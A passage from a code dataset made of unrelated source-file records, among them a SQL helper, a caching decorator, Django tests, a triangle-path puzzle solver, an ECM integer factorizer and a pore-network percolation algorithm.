sqlalchemy import text\n\n\ndef execute(sql=None, firstonly=False, params=None):\n result = []\n if sql:\n if firstonly:\n row = g.tran.execute(text(sql), params).first()\n if row:\n column = {}\n for col in row.items():\n column[col[0]] = col[1]\n result.append(column)\n else:\n rows = g.tran.execute(text(sql), params).fetchall()\n for row in rows:\n column = {}\n for col in row.items():\n column[col[0]] = col[1]\n result.append(column)\n return result\n\n","sub_path":"backend/app/helper/sql_utils.py","file_name":"sql_utils.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"508949354","text":"\"\"\" Compiled: 2020-09-18 10:38:52 \"\"\"\n\n#__src_file__ = \"extensions/ArenaExcel/etc/ArenaExcelActions.py\"\nimport ArenaExcelHtmlSheet\nimport FHtmlClipboard\nimport ArenaExcelSheet\nimport FClipboard\n\n\nfrom ArenaExcelUtils import logger, ClipboardSettings\n\n\ndef Copy(data, clipFormat=FClipboard.CF_TEXT):\n source = FClipboard.ToClipboardData(data)\n FClipboard.SetClipboardData(clipFormat, source)\n \ndef CopyCells(cells, htmlCells):\n with FClipboard.ClipboardHandler():\n Copy(Html(htmlCells), clipFormat=FClipboard.CF_HTML)\n Copy(Text(cells))\n \ndef 
Html(htmlCellMatrix):\n htmlTable = ArenaExcelHtmlSheet.HtmlTablePrinter(htmlCellMatrix).Print()\n return FHtmlClipboard.HtmlClipboard().GetSource(htmlTable)\n \ndef Text(cellMatrix):\n return ArenaExcelSheet.TextPrinter(cellMatrix).Print()\n\ndef CopyAllCells(eii):\n try:\n sheet = eii.ExtensionObject().ActiveSheet()\n sheetMatrix = list(ArenaExcelSheet.SheetMatrix(sheet))\n sheetCells = ArenaExcelSheet.CellsFromSheet(sheetMatrix, sheet, ClipboardSettings())\n sheetHtmlCells = ArenaExcelHtmlSheet.HtmlCellsFromArenaExcelSheet(sheetCells)\n CopyCells(sheetCells, sheetHtmlCells)\n except Exception as err:\n logger.error(err, exc_info=True)\n\ndef CopySelectedCells(eii):\n try:\n sheet = eii.ExtensionObject().ActiveSheet()\n selectionMatrix = list(ArenaExcelSheet.SelectionMatrix(sheet))\n selectedCells = ArenaExcelSheet.CellsFromSelection(selectionMatrix, sheet, ClipboardSettings())\n selectedHtmlCells = ArenaExcelHtmlSheet.HtmlCellsFromArenaExcelSelection(selectedCells)\n CopyCells(selectedCells, selectedHtmlCells)\n except Exception as err:\n logger.error(err, exc_info=True)\n \ndef CopyVisibleCells(eii):\n try:\n sheet = eii.ExtensionObject().ActiveSheet()\n sheetMatrix = list(ArenaExcelSheet.SheetMatrix(sheet, visibleCellsOnly=True))\n sheetCells = ArenaExcelSheet.CellsFromSheet(sheetMatrix, sheet, ClipboardSettings())\n sheetHtmlCells = ArenaExcelHtmlSheet.HtmlCellsFromArenaExcelSheet(sheetCells)\n CopyCells(sheetCells, sheetHtmlCells)\n except Exception as err:\n logger.error(err, exc_info=True)\n","sub_path":"Extensions/Arena Excel/FPythonCode/ArenaExcelActions.py","file_name":"ArenaExcelActions.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"370374075","text":"# -*- coding: utf-8 -*-\n\n__author__ = 'Daniel Greenfeld'\n__email__ = 'pydanny@gmail.com'\n__version__ = '1.0.0'\n__license__ = 'BSD'\n\nfrom time import time\nimport threading\n\n\nclass cached_property(object):\n \"\"\" A property that is only computed once per instance and then replaces\n itself with an ordinary attribute. 
Deleting the attribute resets the\n property.\n\n Source: https://github.com/bottlepy/bottle/commit/fa7733e075da0d790d809aa3d2f53071897e6f76\n \"\"\" # noqa\n\n def __init__(self, ttl=None):\n ttl_or_func = ttl\n self.ttl = None\n if callable(ttl_or_func):\n self.prepare_func(ttl_or_func)\n else:\n self.ttl = ttl_or_func\n\n def prepare_func(self, func, doc=None):\n '''Prepare to cache object method.'''\n self.func = func\n self.__doc__ = doc or func.__doc__\n self.__name__ = func.__name__\n self.__module__ = func.__module__\n\n def __call__(self, func, doc=None):\n self.prepare_func(func, doc)\n return self\n\n def __get__(self, obj, cls):\n if obj is None:\n return self\n\n now = time()\n try:\n value, last_update = obj._cache[self.__name__]\n if self.ttl and self.ttl > 0 and now - last_update > self.ttl:\n raise AttributeError\n except (KeyError, AttributeError):\n value = self.func(obj)\n try:\n cache = obj._cache\n except AttributeError:\n cache = obj._cache = {}\n cache[self.__name__] = (value, now)\n\n return value\n\n def __delattr__(self, name):\n print(name)\n\n\nclass threaded_cached_property(cached_property):\n \"\"\" A cached_property version for use in environments where multiple\n threads might concurrently try to access the property.\n \"\"\"\n def __init__(self, ttl=None):\n super(threaded_cached_property, self).__init__(ttl)\n self.lock = threading.RLock()\n\n def __get__(self, obj, cls):\n with self.lock:\n # Double check if the value was computed before the lock was\n # acquired.\n prop_name = self.__name__\n if hasattr(obj, '_cache') and prop_name in obj._cache:\n return obj._cache[prop_name][0]\n\n # If not, do the calculation and release the lock.\n return super(threaded_cached_property, self).__get__(obj, cls)\n","sub_path":"cached_property.py","file_name":"cached_property.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"638071362","text":"import os\r\nimport numpy as np\r\nimport utils\r\nimport pandas as pd\r\nfrom models import AttnClassifier\r\nimport torch\r\nimport shutil\r\n\r\n\r\ndef project_attn(dataset, data_type, gene_or_pathway, img_data_dir=None, save_top_weighted_patches=False):\r\n data_dir = './experiments/{:s}/{:s}/{:s}/test_best'.format(dataset, data_type, gene_or_pathway)\r\n save_dir = '{:s}/attn_maps'.format(data_dir)\r\n os.makedirs(save_dir, exist_ok=True)\r\n\r\n os.environ['CUDA_VISIBLE_DEVICES'] = '0'\r\n\r\n model_path = './experiments/{:s}/{:s}/{:s}/checkpoint_30.pth.tar'.format(dataset, data_type, gene_or_pathway)\r\n model = AttnClassifier(2048, 2)\r\n model = model.cuda()\r\n best_checkpoint = torch.load(model_path)\r\n model.load_state_dict(best_checkpoint['state_dict'])\r\n gamma = model.attn.gamma.item()\r\n\r\n data_split = np.load('../data/{:s}/data_split.npy'.format(dataset), allow_pickle=True).item()\r\n\r\n test_attns = np.load('{:s}/test_attn_maps.npy'.format(data_dir), allow_pickle=True).item()\r\n test_probs = np.load('{:s}/test_prob_results.npy'.format(data_dir), allow_pickle=True).item()\r\n indices = {}\r\n attn_weights_all = {}\r\n labels = {}\r\n for slide_name in data_split['test']:\r\n if slide_name not in test_attns.keys():\r\n continue\r\n attn = np.array(test_attns[slide_name]['attn'])\r\n indices[slide_name] = np.array(test_attns[slide_name]['true_indices'])\r\n\r\n attn_weights = np.sum(attn, axis=0) * gamma + 1\r\n attn_weights_normalized = np.log(attn_weights) / np.max(np.log(attn_weights))\r\n\r\n # save top 
20 patches\r\n if save_top_weighted_patches:\r\n label = test_probs[slide_name]['label']\r\n os.makedirs('{:s}/top_weighted_patches/{:d}_{:s}'.format(data_dir, label, slide_name), exist_ok=True)\r\n sorted_attn_weights = sorted(attn_weights)[::-1]\r\n index_sorted = np.argsort(attn_weights)[::-1]\r\n for i in range(20):\r\n index = indices[slide_name][index_sorted[i]]\r\n img_path = '{:s}/{:s}/{:d}.png'.format(img_data_dir, slide_name, index)\r\n shutil.copy2(img_path, '{:s}/top_weighted_patches/{:d}_{:s}/{:d}-{:d}-{:.4f}.png'\r\n .format(data_dir, label, slide_name, i+1, index, sorted_attn_weights[i]))\r\n\r\n attn_weights_all[slide_name] = attn_weights_normalized\r\n labels[slide_name] = test_probs[slide_name]['label']\r\n\r\n utils.project_results(dataset, data_split['test'], indices, save_dir, color=(0, 255, 0), on_thumbnail=False,\r\n slides_probs=attn_weights_all, slides_labels=labels)\r\n\r\n\r\nif __name__ == '__main__':\r\n dataset = 'TCGA-LUAD'\r\n gene_or_pathway = 'TP53'\r\n data_type = 'mutation'\r\n img_data_dir = '../data/{:s}/20x_512x512'.format(dataset)\r\n project_attn(dataset, data_type, gene_or_pathway, img_data_dir, save_top_weighted_patches=False)","sub_path":"code_validation_on_lung_and_liver/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"265391359","text":"from django.test import TestCase\nfrom django.db.utils import IntegrityError\n\nfrom core.models import User\n\n\nclass TestUserModel(TestCase):\n def test_cannot_create_users_with_duplicate_emails(self):\n try:\n user1 = User.objects.create(email=\"admin@admin.com\")\n user2 = User.objects.create(email=\"admin@admin.com\")\n except IntegrityError as e:\n self.assertEquals(str(e), \"UNIQUE constraint failed: core_user.email\")\n self.assertRaises(IntegrityError)\n\n def test_creating_users_with_duplicate_username_raises_integrity_error(self):\n try:\n user1 = User.objects.create(\n username=\"ea6c5a25-41c1-4aeb-8d2d-8a64f86555ff\", email=\"foo@admin.com\"\n )\n user2 = User.objects.create(\n username=\"ea6c5a25-41c1-4aeb-8d2d-8a64f86555ff\", email=\"bar@admin.com\"\n )\n except IntegrityError as e:\n self.assertEquals(str(e), \"UNIQUE constraint failed: core_user.username\")\n self.assertRaises(IntegrityError)\n\n def test_user_object_is_identified_using_email(self):\n user1 = User.objects.create(email=\"foo@admin.com\")\n user2 = User.objects.create(email=\"bar@admin.com\")\n user3 = User.objects.create(email=\"baz@admin.com\")\n\n self.assertEquals(user1.__str__(), \"foo@admin.com\")\n self.assertEquals(user2.__str__(), \"bar@admin.com\")\n self.assertEquals(user3.__str__(), \"baz@admin.com\")\n","sub_path":"shynet/core/tests/models/test_user_model.py","file_name":"test_user_model.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"69717753","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport sys\nimport io\nimport json\nfrom setuptools import setup, find_packages\n\n\n_ver = sys.version_info\nis_py2 = (_ver[0] == 2)\nis_py3 = (_ver[0] == 3)\n\n\nDIR = os.path.abspath(os.path.dirname(__file__))\nPKG = os.path.join(DIR, 'jsontableschema')\nREADME = 'README.md'\nLICENSE = 'LICENSE'\nINFO = 'info.json'\nREADME_PATH = os.path.join(DIR, README)\nLICENSE_PATH = 
os.path.join(DIR, LICENSE)\nINFO_PATH = os.path.join(PKG, INFO)\n\nwith io.open(README_PATH, mode='r+t', encoding='utf-8') as stream:\n description_text = stream.read()\n\nwith io.open(LICENSE_PATH, mode='r+t', encoding='utf-8') as stream:\n license_text = stream.read()\n\nwith io.open(INFO_PATH, mode='r+t', encoding='utf-8') as stream:\n info = json.loads(stream.read())\n\nlong_description = '{0}\\n\\n{1}'.format(description_text, license_text)\n\ndependencies = [\n 'click>=3.3',\n 'requests>=2.5.1',\n 'python-dateutil>=2.4.0',\n 'rfc3986>=0.3.0',\n 'jsonschema>=2.5.1',\n 'future>=0.15.2'\n]\n\nclassifiers = [\n 'Development Status :: 4 - Beta',\n 'Environment :: Web Environment',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4',\n 'Topic :: Internet :: WWW/HTTP :: Dynamic Content',\n 'Topic :: Software Development :: Libraries :: Python Modules'\n]\n\nsetup(\n name=info['slug'],\n version=info['version'],\n description=info['description'],\n long_description=long_description,\n author=info['author'],\n author_email=info['author_email'],\n url=info['url'],\n license=info['license'],\n packages=find_packages(exclude=['docs', 'tests']),\n package_data={'jsontableschema': ['*.json', 'geojson/*json']},\n package_dir={info['slug']: info['slug']},\n install_requires=dependencies,\n zip_safe=False,\n keywords=\"open data frictionless data json schema json table schema data package tabular data package\",\n classifiers=classifiers,\n entry_points={\n 'console_scripts': [\n 'jsontableschema = jsontableschema.cli:main',\n ]\n }\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"95915755","text":"from direct.distributed.DistributedObjectGlobalUD import DistributedObjectGlobalUD\r\nfrom toontown.suit.MegaInvasionGlobals import *\r\nfrom datetime import datetime\r\nfrom toontown.parties.ToontownTimeZone import ToontownTimeZone\r\n\r\nPARSE_INTERVAL = 60\r\n\r\n\r\nclass MegaInvasionManagerUD(DistributedObjectGlobalUD):\r\n notify = directNotify.newCategory('MegaInvasionManagerUD')\r\n\r\n def announceGenerate(self):\r\n DistributedObjectGlobalUD.announceGenerate(self)\r\n taskMgr.doMethodLater(10, self.parseInvasions, self.uniqueName('parseInvasions'))\r\n self.calledInvasion = None\r\n\r\n def parseInvasions(self, task):\r\n for invasion in invasions:\r\n if self.calledInvasion is not None:\r\n continue\r\n\r\n index = invasions.index(invasion)\r\n if index == self.calledInvasion:\r\n continue\r\n\r\n start = parseInvasionTime(invasion[START_TIME])\r\n end = parseInvasionTime(invasion[END_TIME])\r\n now = datetime.now(tz=ToontownTimeZone())\r\n if start < now < end:\r\n taskMgr.remove(self.uniqueName('endInvasion'))\r\n self.calledInvasion = index\r\n self.callInvasion(index)\r\n timeLeft = end - now\r\n taskMgr.doMethodLater(timeLeft.total_seconds(), self.endInvasion, self.uniqueName('endInvasion'),\r\n extraArgs=[index], appendTask=False)\r\n\r\n taskMgr.doMethodLater(PARSE_INTERVAL, self.parseInvasions, self.uniqueName('parseInvasions'))\r\n\r\n def callInvasion(self, index):\r\n self.sendUpdate('callInvasion', [index])\r\n\r\n def endInvasion(self, index):\r\n 
self.calledInvasion = None\r\n self.sendUpdate('endInvasion', [index])\r\n\r\n def hello(self):\r\n if self.calledInvasion is not None:\r\n self.sendUpdateToChannel(self.air.getAvatarIdFromSender(), 'callInvasion', [self.calledInvasion])","sub_path":"uberdog/MegaInvasionManagerUD.py","file_name":"MegaInvasionManagerUD.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"476967127","text":"#!/usr/bin/env python3\nimport sys\n\n\nclass Node_Tree_Element(object):\n \"\"\"individual element of the node tree\n These objects contain node information such as left child, right child,\n level on the tree and node integer value\n \"\"\"\n def __init__(self, node_value):\n assert isinstance(node_value, int)\n self.__node_level = None\n self.__node_value = node_value\n self.__best_path_down = None\n self.__left_child = None\n self.__right_child = None\n\n def get_nl(self):\n return self.__node_level\n\n def set_nl(self, node_level):\n assert isinstance(node_level, int)\n assert node_level > -1\n self.__node_level = node_level\n\n def del_nl(self):\n pass\n\n node_level = property(get_nl, set_nl, del_nl)\n\n def get_nv(self):\n return self.__node_value\n\n def set_nv(self, node_value):\n assert isinstance(node_value, int)\n assert node_value > -1\n self.__node_value = node_value\n\n def del_nv(self):\n pass\n\n node_value = property(get_nv, set_nv, del_nv)\n\n def get_bpd(self):\n return self.__best_path_down\n\n def set_bpd(self, best_path_down):\n assert isinstance(best_path_down, str)\n self.__best_path_down = best_path_down\n\n def del_bpd(self):\n pass\n\n best_path_down = property(get_bpd, set_bpd, del_bpd)\n\n def get_lc(self):\n return self.__left_child\n\n def set_lc(self, left_child):\n assert isinstance(left_child, int)\n assert left_child > 0\n self.__left_child = left_child\n\n def del_lc(self):\n pass\n\n left_child = property(get_lc, set_lc, del_lc)\n\n def get_rc(self):\n return self.__right_child\n\n def set_rc(self, right_child):\n assert isinstance(right_child, int)\n assert right_child > 0\n self.__right_child = right_child\n\n def del_rc(self):\n pass\n\n right_child = property(get_rc, set_rc, del_rc)\n\n\nclass Node_Tree(list):\n \"\"\"this class is an extension of the list class\n set to only allow Node_Tree_Elements in it\n \"\"\"\n\n def append(self, *args, **kwargs):\n assert isinstance(args[0], Node_Tree_Element)\n return list.append(self, *args, **kwargs)\n\n def insert(self, *args, **kwargs):\n assert isinstance(args[0], Node_Tree_Element)\n return list.insert(self, *args, **kwargs)\n\n\ndef main(argv=None):\n\n file_name = argv\n number_of_levels = 0\n number_of_elements = 0\n nt = Node_Tree()\n\n # load text files into the tree by creating elements based on input\n # file contains lines with numbers, each line new level\n # file must contain only valid integers with separating space\n with open(file_name, encoding='utf-8') as file_in:\n for line_in in file_in:\n # remove trailing newline, etc.\n line_in = line_in.rstrip()\n split_line = line_in.split(\" \")\n for value_in in split_line:\n nte = Node_Tree_Element(int(value_in))\n nte.node_level = number_of_levels\n number_of_elements += 1\n nt.append(nte)\n number_of_levels += 1\n\n # now that all of the values are in the tree the left and right children\n # locations need to be set so the tree can be traversed\n # the last level - leaf nodes will be left null\n this_element = 0\n this_level = 0\n 
add_child_pointers_below_these_levels = number_of_levels - 1\n\n # only up to last level\n while this_level < add_child_pointers_below_these_levels:\n # left and right children are determined by a calculation to determine\n # position in the tree based on input file\n lc_position = this_element + this_level + 1\n rc_position = lc_position + 1\n nt[this_element].left_child = lc_position\n nt[this_element].right_child = rc_position\n this_element += 1\n this_level = nt[this_element].node_level\n\n # start at last node and roll up the best path for each node based on\n # the either the left or right child\n # use number of elements for relative subscript so decrease by 1\n max_nodes = number_of_elements - 1\n for i in range(max_nodes, -1, -1):\n lc = nt[i].left_child\n rc = nt[i].right_child\n new_node_value = 0\n if ((lc == None) or (rc == None)):\n # the bottom nodes have no children\n new_node_value = nt[i].node_value\n new_best_path_down = \"\\n\" \\\n + str(nt[i].node_value) \\\n + \" at node \" \\\n + str(i) \\\n + \" on level \" \\\n + str(nt[i].node_level)\n else:\n if (nt[lc].node_value > nt[rc].node_value):\n new_node_value = nt[i].node_value + nt[lc].node_value\n new_best_path_down = \"\\n\" \\\n + str(nt[i].node_value) \\\n + \" at node \" \\\n + str(i) \\\n + \" on level \" \\\n + str(nt[lc].node_level) \\\n + str(nt[lc].best_path_down)\n else:\n new_node_value = nt[i].node_value + nt[rc].node_value\n new_best_path_down = \"\\n\" \\\n + str(nt[i].node_value) \\\n + \" at node \" \\\n + str(i) \\\n + \" on level \" \\\n + str(nt[rc].node_level) \\\n + str(nt[rc].best_path_down)\n nt[i].node_value = new_node_value\n nt[i].best_path_down = new_best_path_down\n\n with open(\"solution.txt\", \"w\") as solution_file:\n solution_file.write(\"Max Value is \" + str(nt[0].node_value) + \"\\n\")\n solution_file.write(\"The Best Path chosen was: \" \\\n + str(nt[0].best_path_down))\n\n return 0\n\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n sys.stderr.write(\"no file name provided\")\n else:\n main(sys.argv[1])\n sys.exit()\n","sub_path":"TrianglePuzzlePython3/src/Triangle.py","file_name":"Triangle.py","file_ext":"py","file_size_in_byte":5956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"365588755","text":"import requests\r\nfrom bs4 import BeautifulSoup as bs\r\nimport os\r\nimport pandas as pd\r\nimport ssl\r\n\r\ndef is_meta_description(tag):\r\n return tag.name == 'meta' and tag['name'] == 'thumbnail'\r\ndf = pd.read_csv(\"data.csv\")\r\nsave_path='./memes/'\r\nfor i in range(1000):\r\n print(i)\r\n img_uid = df['img_id'][i]\r\n url = 'https://memegenerator.net/instance/'+str(img_uid)\r\n r = requests.get(url)\r\n soup = bs(r.text,'html.parser')\r\n image_url = soup.select_one('[rel=\"image_src\"]')['href']\r\n \r\n complete_name = os.path.join(save_path, f\"{img_uid}.jpg\")\r\n response = requests.get(image_url, stream=True)\r\n \r\n with open(complete_name, 'wb') as im_file:\r\n im_file.write(response.content)\r\n del response\r\n \r\n \r\n\r\n\r\nmeta_tag = soup.find(is_meta_description)","sub_path":"meme2caption/Imgid2meme.py","file_name":"Imgid2meme.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"478276182","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n#-------------------------------------------------------------------------\n#\n# 
Log handling module\n#\n#-------------------------------------------------------------------------\n\nimport os\nimport sys\nimport time\n\n__all__ = ['Log']\n\nclass Log:\n\n def __init__(self, config):\n self.config = config\n self.path = self._get_file_path()\n \n def write(self, message):\n if not message:\n return\n if isinstance(message, list):\n lines = message\n else:\n lines = [message]\n prefix = self._format_message_prefix()\n chunks = [ ]\n chunks.append(prefix + lines[0] + '\\n')\n for line in lines[1:]:\n chunks.append(line + '\\n')\n text = ''.join(chunks)\n data = text.encode('utf_8', errors='ignore')\n self._append(data) \n\n def _append(self, data):\n if not data:\n return\n path = self._get_resolved_file_path()\n try:\n open(path, 'a+b').write(data)\n except (OSError, IOError):\n # file IO error ignored\n pass\n\n def _format_message_prefix(self):\n return time.strftime('[%Y-%m-%d %H:%M:%S] ')\n \n def _get_resolved_file_path(self):\n name = time.strftime('%Y_%m_%d.txt')\n return os.path.join(self.path, name)\n\n def _get_file_path(self):\n key = 'log_file_path'\n path = self.config.get(key)\n if not path:\n print('Error: missing config option \"%s\"' % key)\n sys.exit(1)\n if not os.path.isdir(path):\n print('Error: path not found %s' % path)\n sys.exit(1)\n return path\n","sub_path":"weibo_comment/ghost_log.py","file_name":"ghost_log.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"522447536","text":"\"\"\"Integer factorization using ECM.\n\"\"\"\nfrom collections import defaultdict\nimport random\nfrom wheel_sieve.miller_rabin import miller_rabin, witness_prime\nfrom wheel_sieve.common import PRIME_GEN, inv_power\nfrom wheel_sieve.ecm.ecm_polyeval import ecm\n\n\ndef factor_small_primes(n, ubound):\n \"\"\"Factor n with small primes into :math:`n = \\\\prod_{i} {p_i}^{d_{p_i}} * x`.\n\n Args:\n n (int): Number to be factored.\n ubound (int): Upper bound for small primes, not inclusive.\n\n Returns:\n tuple(dict, int): (prime_factors, x), where\n\n - **prime_factors** (dict(int, int)): mapping :math:`p_i` to :math:`d_{p_i}`.\n - **x** (int): Integer x.\n\n \"\"\"\n prime_factors = dict()\n x = n\n for prime in PRIME_GEN(ubound):\n power = 0\n while x % prime == 0:\n power += 1\n x //= prime\n if power > 0:\n prime_factors[prime] = power\n return prime_factors, x\n\n\ndef factor_power(n, ubound):\n \"\"\"Find a factor of n if n is a perfect k-th power for some k < ubound.\n i.e. :math:`n = d^k` for some integers d, k, where k >= 2.\n\n Args:\n n (int): Number to be factored.\n ubound (int): Upper bound for k, not inclusive.\n\n Returns:\n tuple(int, int): (d, k), or (None, None) if n is not a perfect power.\n \"\"\"\n for power in PRIME_GEN(ubound):\n factor = inv_power(n, power)\n if factor is not None:\n return factor, power\n return None, None\n\n\ndef factor_ecm(n, ecm_kwargs_list, seed=None):\n \"\"\"Find a factor of a number n using ECM.\n\n Args:\n n (int): Number to be factored.\n ecm_kwargs_list (list(dict)): List of dicts containing keyword arguments to be passed to ecm\n call.\n seed (int, optional): Random seed to be set every ecm call. 
Defaults to None.\n\n Returns:\n int: Factor, or None if not found.\n \"\"\"\n for ecm_kwargs in ecm_kwargs_list:\n if seed is not None:\n random.seed(seed)\n factor = ecm(n, **ecm_kwargs)\n if factor is not None:\n return factor\n return None\n\n\ndef factorize(n, witness=None):\n \"\"\"Factorize a number n, where n >= 2, with ECM into\n :math:`n = \\\\prod_{i} {p_i}^{d_{p_i}} * \\\\prod_{j} {f_j}^{d_{f_j}}`.\n Each :math:`p_i` passes the Miller Rabin Primality Test and is (probably) prime.\n Each :math:`f_j` are known composite that cannot be factored because we try a fixed number\n of curves.\n\n Args:\n n (int): Integer to factorize.\n witness (list(int), optional): Witness to be used in Miller Rabin Primality Test.\n Defaults to witness_prime(100).\n\n Raises:\n ValueError: Thrown when n < 2\n\n Returns:\n tuple(dict, dict): (prime_factors, remaining_factors), where\n\n - **prime_factors** (dict(int, int)): mapping :math:`p_i` to :math:`d_{p_i}`.\n - **remaining_factors** (dict(int, int)): mapping :math:`f_j` to :math:`d_{f_j}`.\n\n \"\"\"\n if n < 2:\n raise ValueError\n if witness is None:\n witness = witness_prime(100)\n prime_factors, factor = factor_small_primes(n, 1033)\n if factor == 1:\n return prime_factors, dict()\n remaining_factors = defaultdict(int)\n working_dict = defaultdict(int)\n working_dict[factor] = 1\n while working_dict:\n factor_i, power_i = working_dict.popitem()\n if miller_rabin(factor_i, witness):\n for dt in [working_dict, remaining_factors]:\n for factor_j in list(dt.keys()):\n if factor_j % factor_i == 0:\n power_j = dt.pop(factor_j)\n while factor_j % factor_i == 0:\n factor_j //= factor_i\n power_i += power_j\n if factor_j > 1:\n working_dict[factor_j] += power_j\n prime_factors[factor_i] = power_i\n else:\n factor, power = factor_power(factor_i, factor_i.bit_length() // 10 + 1)\n if factor is not None:\n working_dict[factor] += power_i * power\n continue\n ecm_kwargs_list = [\n {\n \"rounds\": 10,\n \"b1\": 2_000,\n \"b2\": 50_000,\n \"wheel\": 210,\n \"output\": False,\n },\n {\n \"rounds\": 40,\n \"b1\": 11_000,\n \"b2\": 600_000,\n \"wheel\": 2310,\n \"output\": False,\n },\n {\n \"rounds\": 100,\n \"b1\": 50_000,\n \"b2\": 4_000_000,\n \"wheel\": 2310,\n \"output\": False,\n },\n {\n \"rounds\": 200,\n \"b1\": 250_000,\n \"b2\": 40_000_000,\n \"wheel\": 2310,\n \"output\": False,\n },\n ]\n factor = factor_ecm(factor_i, ecm_kwargs_list, seed=2)\n if factor is not None:\n working_dict[factor_i // factor] += power_i\n working_dict[factor] += power_i\n continue\n remaining_factors[factor_i] += power_i\n return prime_factors, dict(remaining_factors)\n\n\nif __name__ == \"__main__\":\n print(factorize((2 ** 256 - 1) * (2 ** 64 - 1) ** 3))\n","sub_path":"wheel_sieve/factorize.py","file_name":"factorize.py","file_ext":"py","file_size_in_byte":5461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"254179216","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n===============================================================================\r\nmodule __OrdinaryPercolation__: Ordinary Percolation Algorithm\r\n===============================================================================\r\n\r\n\"\"\"\r\n\r\nimport scipy as sp\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom OpenPNM.Algorithms import GenericAlgorithm\r\nfrom OpenPNM.Base import logging\r\nlogger = logging.getLogger(__name__)\r\n\r\n\r\nclass OrdinaryPercolation(GenericAlgorithm):\r\n r\"\"\"\r\n Simulates a capillary drainage 
experiment by applying a list of increasing\r\n capillary pressures.\r\n\r\n Parameters\r\n ----------\r\n network : OpenPNM Network Object\r\n The network upon which the simulation will be run\r\n\r\n name : string, optional\r\n The name to assign to the Algorithm Object\r\n\r\n \"\"\"\r\n\r\n def __init__(self, network, name=None, **kwargs):\r\n super().__init__(network=network, name=name)\r\n if len(kwargs.keys()) > 0:\r\n self.setup(**kwargs)\r\n\r\n def setup(self,\r\n invading_phase,\r\n defending_phase=None,\r\n t_entry='throat.capillary_pressure',\r\n **kwargs):\r\n r\"\"\"\r\n invading_phase : OpenPNM Phase Object\r\n The invading phase to be injected into the Network\r\n\r\n p_inlets : array_like\r\n The injection points from which the invading phase accesses the\r\n Network. If no inlets are specified then the algorithm assumes\r\n no access limitations apply to the invading phase, which is\r\n equivalent to performaing a standard bond ordinary percolation.\r\n\r\n\r\n Notes\r\n -----\r\n The 'inlet' pores are initially filled with invading fluid to start the\r\n simulation. To avoid the capillary pressure curve showing a non-zero\r\n starting saturation at low pressures, it is necessary to apply boundary\r\n pores that have zero-volume, and set these as the inlets.\r\n \"\"\"\r\n self['throat.entry_pressure'] = invading_phase[t_entry]\r\n self['pore.inv_Pc'] = sp.inf\r\n self['throat.inv_Pc'] = sp.inf\r\n self['pore.inv_sat'] = sp.inf\r\n self['throat.inv_sat'] = sp.inf\r\n self._inv_phase = invading_phase\r\n self._def_phase = defending_phase\r\n self._trapping = False\r\n\r\n def set_inlets(self, pores):\r\n r\"\"\"\r\n Specify inlet locations\r\n\r\n Parameters\r\n ----------\r\n pores : array_like\r\n The injection points from which the invading phase accesses the\r\n Network. If no inlets are specified then the algorithm assumes\r\n no access limitations apply to the invading phase, which is\r\n equivalent to performaing a standard bond ordinary percolation.\r\n\r\n\r\n Notes\r\n -----\r\n The 'inlet' pores are initially filled with invading fluid to start the\r\n simulation. To avoid the capillary pressure curve showing a non-zero\r\n starting saturation at low pressures, it is necessary to apply boundary\r\n pores that have zero-volume, and set these as the inlets.\r\n \"\"\"\r\n Ps = sp.array(pores)\r\n if sp.size(Ps) > 0:\r\n if Ps.dtype == bool:\r\n Ps = self._net.Ps[Ps]\r\n self['pore.inlets'] = False\r\n self['pore.inlets'][Ps] = True\r\n\r\n def set_outlets(self, pores, defending_phase=None):\r\n r\"\"\"\r\n Specify outlet locations\r\n\r\n Parameters\r\n ----------\r\n pores : array_like\r\n The pores through which the defending phase exits the Network.\r\n\r\n defending_phase : OpenPNM Phase Object\r\n The Phase object defining the defending phase. The defending Phase\r\n may be specified during the ``setup`` step, or through this method.\r\n \"\"\"\r\n if defending_phase is not None:\r\n self._def_phase = defending_phase\r\n\r\n self._trapping = True\r\n\r\n Ps = sp.array(pores)\r\n if sp.size(Ps) > 0:\r\n if Ps.dtype == bool:\r\n Ps = self._net.Ps[Ps]\r\n self['pore.outlets'] = False\r\n self['pore.outlets'][Ps] = True\r\n\r\n def run(self, npts=25, inv_points=None, access_limited=True, **kwargs):\r\n r\"\"\"\r\n Parameters\r\n ----------\r\n npts : int (default = 25)\r\n The number of pressure points to apply. 
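# set_inlets()/set_outlets() above accept either pore indices or a boolean
# mask and normalise masks to indices via fancy indexing
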